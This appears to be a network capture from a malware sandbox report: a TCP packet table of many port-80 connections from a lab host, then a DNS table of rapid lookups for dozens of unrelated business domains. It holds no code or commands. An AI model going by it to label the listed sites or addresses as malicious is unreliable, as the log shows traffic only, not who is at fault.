                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:42.975657940 CET8049904172.67.201.26192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:42.975681067 CET8049904172.67.201.26192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:42.975696087 CET4990480192.168.2.5172.67.201.26
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:42.975707054 CET804991262.75.216.137192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:42.975727081 CET4990480192.168.2.5172.67.201.26
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:42.975761890 CET4990480192.168.2.5172.67.201.26
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:42.975842953 CET804991262.75.216.137192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:42.975884914 CET4991280192.168.2.562.75.216.137
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:42.975884914 CET4991280192.168.2.562.75.216.137
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:42.975913048 CET4991280192.168.2.562.75.216.137
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:42.975934982 CET804991262.75.216.137192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:42.976030111 CET4991280192.168.2.562.75.216.137
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:42.976267099 CET804991262.75.216.137192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:42.976310015 CET804991262.75.216.137192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:42.976330042 CET804991262.75.216.137192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:42.976372004 CET4991280192.168.2.562.75.216.137
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:42.976372004 CET4991280192.168.2.562.75.216.137
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:42.976382971 CET804991262.75.216.137192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:42.976406097 CET4991280192.168.2.562.75.216.137
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:42.976473093 CET804991262.75.216.137192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:42.976509094 CET4991280192.168.2.562.75.216.137
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:42.976527929 CET4991280192.168.2.562.75.216.137
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:42.976592064 CET804991262.75.216.137192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:42.976711988 CET804991262.75.216.137192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:42.976810932 CET804991262.75.216.137192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:42.976850033 CET4991280192.168.2.562.75.216.137
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:42.976888895 CET804991262.75.216.137192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:42.976887941 CET4991280192.168.2.562.75.216.137
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:42.976887941 CET4991280192.168.2.562.75.216.137
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:42.977020025 CET804991262.75.216.137192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:42.977086067 CET4991280192.168.2.562.75.216.137
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:42.977118969 CET804991262.75.216.137192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:42.977251053 CET804991262.75.216.137192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:42.977330923 CET804991262.75.216.137192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:42.977421045 CET4991280192.168.2.562.75.216.137
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:42.977449894 CET804991262.75.216.137192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:42.977449894 CET4991280192.168.2.562.75.216.137
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:42.977559090 CET804991262.75.216.137192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:42.977663040 CET4991280192.168.2.562.75.216.137
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:42.977678061 CET804991262.75.216.137192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:42.977778912 CET804991262.75.216.137192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:42.977907896 CET804991262.75.216.137192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:42.978007078 CET804991262.75.216.137192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:42.978025913 CET4991280192.168.2.562.75.216.137
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:42.978025913 CET4991280192.168.2.562.75.216.137
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:42.978110075 CET804991262.75.216.137192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:42.978178978 CET4991280192.168.2.562.75.216.137
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:42.978260040 CET804991262.75.216.137192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:42.978322029 CET804991262.75.216.137192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:42.978445053 CET804991262.75.216.137192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:42.978451014 CET4991280192.168.2.562.75.216.137
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:42.978646040 CET804991262.75.216.137192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:42.978727102 CET4991280192.168.2.562.75.216.137
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:42.978763103 CET804991262.75.216.137192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:42.978861094 CET804991262.75.216.137192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:42.978883982 CET804991262.75.216.137192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:42.978889942 CET4991280192.168.2.562.75.216.137
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:42.978990078 CET804991262.75.216.137192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:42.979094982 CET804991262.75.216.137192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:42.979156971 CET4991280192.168.2.562.75.216.137
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:42.979156971 CET4991280192.168.2.562.75.216.137
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:42.979157925 CET4991280192.168.2.562.75.216.137
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:42.979201078 CET804991262.75.216.137192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:42.979259014 CET4991280192.168.2.562.75.216.137
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:42.979429960 CET804991262.75.216.137192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:42.979718924 CET4991280192.168.2.562.75.216.137
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:42.995027065 CET804991262.75.216.137192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:42.995090008 CET804991262.75.216.137192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:42.995240927 CET4991280192.168.2.562.75.216.137
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:42.995587111 CET804991262.75.216.137192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:42.995606899 CET804991262.75.216.137192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:42.995721102 CET4991280192.168.2.562.75.216.137
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:42.995817900 CET804991262.75.216.137192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:42.995876074 CET4991280192.168.2.562.75.216.137
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:42.995908022 CET804991262.75.216.137192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:42.995985031 CET804991262.75.216.137192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:42.996058941 CET804991262.75.216.137192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:42.996156931 CET4991280192.168.2.562.75.216.137
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:42.996189117 CET804991262.75.216.137192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:42.996321917 CET804991262.75.216.137192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:42.996411085 CET4991280192.168.2.562.75.216.137
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:42.996412039 CET4991280192.168.2.562.75.216.137
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:42.996671915 CET804991262.75.216.137192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:42.996743917 CET804991262.75.216.137192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:42.996783972 CET804991262.75.216.137192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:42.996803999 CET804991262.75.216.137192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:42.996824026 CET4991280192.168.2.562.75.216.137
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:42.996828079 CET804991262.75.216.137192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:42.996928930 CET4991280192.168.2.562.75.216.137
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:42.996928930 CET4991280192.168.2.562.75.216.137
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:42.996947050 CET804991262.75.216.137192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:42.997064114 CET804991262.75.216.137192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:42.997113943 CET4991280192.168.2.562.75.216.137
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:42.997144938 CET804991262.75.216.137192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:42.997267962 CET804991262.75.216.137192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:42.997364998 CET804991262.75.216.137192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:42.997387886 CET4991280192.168.2.562.75.216.137
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:42.997452021 CET4991280192.168.2.562.75.216.137
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:42.997462988 CET804991262.75.216.137192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:42.997720957 CET804991262.75.216.137192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:42.997819901 CET804991262.75.216.137192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:42.997874975 CET4991280192.168.2.562.75.216.137
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:42.997880936 CET804991262.75.216.137192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:42.997977972 CET804991262.75.216.137192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:42.998035908 CET804991262.75.216.137192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:42.998071909 CET4991280192.168.2.562.75.216.137
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:42.998071909 CET4991280192.168.2.562.75.216.137
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:42.998125076 CET804991262.75.216.137192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:42.998226881 CET804991262.75.216.137192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:42.998235941 CET4991280192.168.2.562.75.216.137
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:42.998320103 CET804991262.75.216.137192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:42.998435974 CET804991262.75.216.137192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:42.998564959 CET4991280192.168.2.562.75.216.137
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:42.998564959 CET4991280192.168.2.562.75.216.137
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:42.998766899 CET804991262.75.216.137192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:42.998850107 CET4991280192.168.2.562.75.216.137
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:42.998883009 CET804991262.75.216.137192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:42.998902082 CET804991262.75.216.137192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:42.998955965 CET804991262.75.216.137192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:42.998964071 CET4991280192.168.2.562.75.216.137
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:42.999102116 CET804991262.75.216.137192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:42.999124050 CET804991262.75.216.137192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:42.999258995 CET804991262.75.216.137192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:42.999263048 CET4991280192.168.2.562.75.216.137
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:42.999263048 CET4991280192.168.2.562.75.216.137
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:42.999322891 CET4991280192.168.2.562.75.216.137
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:42.999352932 CET804991262.75.216.137192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:42.999408007 CET804991262.75.216.137192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:42.999814987 CET4991280192.168.2.562.75.216.137
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:42.999814987 CET4991280192.168.2.562.75.216.137
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:43.022852898 CET8049911208.97.178.138192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:43.057162046 CET8049913208.97.178.138192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:43.057346106 CET4991380192.168.2.5208.97.178.138
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:43.081414938 CET8049909108.167.164.216192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:43.081557989 CET4990980192.168.2.5108.167.164.216
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:43.100217104 CET4991380192.168.2.5208.97.178.138
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:43.208961010 CET8049913208.97.178.138192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:43.210751057 CET8049913208.97.178.138192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:43.210833073 CET8049913208.97.178.138192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:43.210836887 CET4991380192.168.2.5208.97.178.138
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:43.210892916 CET4991380192.168.2.5208.97.178.138
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:43.233000040 CET4991380192.168.2.5208.97.178.138
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:43.337203026 CET4985580192.168.2.5210.140.73.39
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:43.341509104 CET8049913208.97.178.138192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:43.346390009 CET4991480192.168.2.55.196.166.214
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:43.386606932 CET80499145.196.166.214192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:43.386795998 CET4991480192.168.2.55.196.166.214
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:43.387032986 CET4991480192.168.2.55.196.166.214
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:43.427947044 CET80499145.196.166.214192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:43.428066969 CET4991480192.168.2.55.196.166.214
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:43.428124905 CET80499145.196.166.214192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:43.428199053 CET4991480192.168.2.55.196.166.214
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:43.428721905 CET4991580192.168.2.5188.166.152.188
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:43.448784113 CET4991680192.168.2.577.68.50.105
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:43.452457905 CET4991780192.168.2.5188.114.96.3
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:43.463553905 CET8049915188.166.152.188192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:43.467348099 CET4991580192.168.2.5188.166.152.188
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:43.471740007 CET4991580192.168.2.5188.166.152.188
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:43.473978996 CET8049917188.114.96.3192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:43.474066019 CET4991780192.168.2.5188.114.96.3
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:43.474618912 CET4991780192.168.2.5188.114.96.3
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:43.485213041 CET804991677.68.50.105192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:43.485313892 CET4991680192.168.2.577.68.50.105
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:43.485652924 CET4991680192.168.2.577.68.50.105
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:43.495620012 CET8049917188.114.96.3192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:43.504211903 CET8049917188.114.96.3192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:43.504301071 CET4991780192.168.2.5188.114.96.3
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:43.506423950 CET8049915188.166.152.188192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:43.506608009 CET4991780192.168.2.5188.114.96.3
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:43.508069992 CET8049915188.166.152.188192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:43.508142948 CET4991580192.168.2.5188.166.152.188
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:43.522330999 CET804991677.68.50.105192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:43.522459030 CET804991677.68.50.105192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:43.522533894 CET4991680192.168.2.577.68.50.105
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:43.531860113 CET8049917188.114.96.3192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:43.531939983 CET4991780192.168.2.5188.114.96.3
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:43.535036087 CET4991880192.168.2.5188.114.96.3
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:43.556067944 CET8049918188.114.96.3192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:43.557234049 CET4991880192.168.2.5188.114.96.3
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:43.557234049 CET4991880192.168.2.5188.114.96.3
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:43.578217983 CET8049918188.114.96.3192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:43.605422974 CET8049918188.114.96.3192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:43.605609894 CET4991880192.168.2.5188.114.96.3
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:43.607417107 CET4991880192.168.2.5188.114.96.3
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:43.636976004 CET8049918188.114.96.3192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:43.637115002 CET4991880192.168.2.5188.114.96.3
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:43.656269073 CET4991680192.168.2.577.68.50.105
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:43.657592058 CET4991980192.168.2.569.163.218.51
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:43.692671061 CET804991677.68.50.105192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:43.692693949 CET804991677.68.50.105192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:43.692791939 CET4991680192.168.2.577.68.50.105
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:43.810866117 CET4992080192.168.2.523.227.38.74
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:43.827828884 CET804991969.163.218.51192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:43.828018904 CET4991980192.168.2.569.163.218.51
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:43.828792095 CET4991980192.168.2.569.163.218.51
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:43.833024025 CET804992023.227.38.74192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:43.833143950 CET4992080192.168.2.523.227.38.74
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:43.833631039 CET4992080192.168.2.523.227.38.74
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:43.854871988 CET804992023.227.38.74192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:43.943833113 CET4992180192.168.2.5154.203.14.100
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:43.986764908 CET804992023.227.38.74192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:43.987204075 CET4992080192.168.2.523.227.38.74
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:43.998389006 CET804991969.163.218.51192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:43.999659061 CET804991969.163.218.51192.168.2.5
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:43.999929905 CET4991980192.168.2.569.163.218.51
                                                                                                                                                                                                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:07.938826084 CET192.168.2.58.8.8.80xca67Standard query (0)www.olras.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:07.939636946 CET192.168.2.58.8.8.80x9de1Standard query (0)www.quadlock.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:07.941828966 CET192.168.2.58.8.8.80x4836Standard query (0)www.wkhk.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:07.944896936 CET192.168.2.58.8.8.80x6b5Standard query (0)www.baijaku.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:07.948393106 CET192.168.2.58.8.8.80x8a1aStandard query (0)www.ftchat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:07.951306105 CET192.168.2.58.8.8.80xeb12Standard query (0)www.pr-park.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:07.953057051 CET192.168.2.58.8.8.80xdf3cStandard query (0)www.pdqhomes.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:07.954642057 CET192.168.2.58.8.8.80x97b1Standard query (0)www.fnw.usA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:07.955593109 CET192.168.2.58.8.8.80x6411Standard query (0)www.dgmna.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:07.956402063 CET192.168.2.58.8.8.80x3f9aStandard query (0)www.jenco.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:08.175811052 CET192.168.2.58.8.8.80x4d63Standard query (0)www.mqs.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:08.176266909 CET192.168.2.58.8.8.80x270fStandard query (0)www.rs-ag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:08.497096062 CET192.168.2.58.8.8.80xcc11Standard query (0)www.item-pr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:08.606940031 CET192.168.2.58.8.8.80x2523Standard query (0)www.alteor.clA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:08.608115911 CET192.168.2.58.8.8.80x7923Standard query (0)www.valdal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:09.017699957 CET192.168.2.58.8.8.80x71c7Standard query (0)www.vazir.seA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:09.018515110 CET192.168.2.58.8.8.80x62bbStandard query (0)www.depalo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:09.021537066 CET192.168.2.58.8.8.80xa754Standard query (0)www.nunomira.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:09.143091917 CET192.168.2.58.8.8.80xf497Standard query (0)www.credo.edu.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:09.146697044 CET192.168.2.58.8.8.80xca23Standard query (0)www.elpro.siA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:09.187952042 CET192.168.2.58.8.8.80xfbfaStandard query (0)www.petsfan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:09.248627901 CET192.168.2.58.8.8.80xb62cStandard query (0)www.nelipak.nlA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:09.370625973 CET192.168.2.58.8.8.80xed35Standard query (0)www.otena.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:10.079495907 CET192.168.2.58.8.8.80x9358Standard query (0)www.transsib.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:10.082881927 CET192.168.2.58.8.8.80xb2baStandard query (0)www.owsports.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:10.083978891 CET192.168.2.58.8.8.80x86afStandard query (0)www.tvtools.fiA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:10.085247040 CET192.168.2.58.8.8.80xe873Standard query (0)www.edimart.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:10.087781906 CET192.168.2.58.8.8.80x5334Standard query (0)www.jroy.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:10.087867975 CET192.168.2.58.8.8.80x4b86Standard query (0)www.t-tre.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:10.097336054 CET192.168.2.58.8.8.80xf217Standard query (0)www.evcpa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:10.736207962 CET192.168.2.58.8.8.80x6cd6Standard query (0)www.abart.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.052344084 CET192.168.2.58.8.8.80xe3c3Standard query (0)www.vexcom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:11.052668095 CET192.168.2.58.8.8.80x2384Standard query (0)www.hummer.huA (IP address)IN (0x0001)false
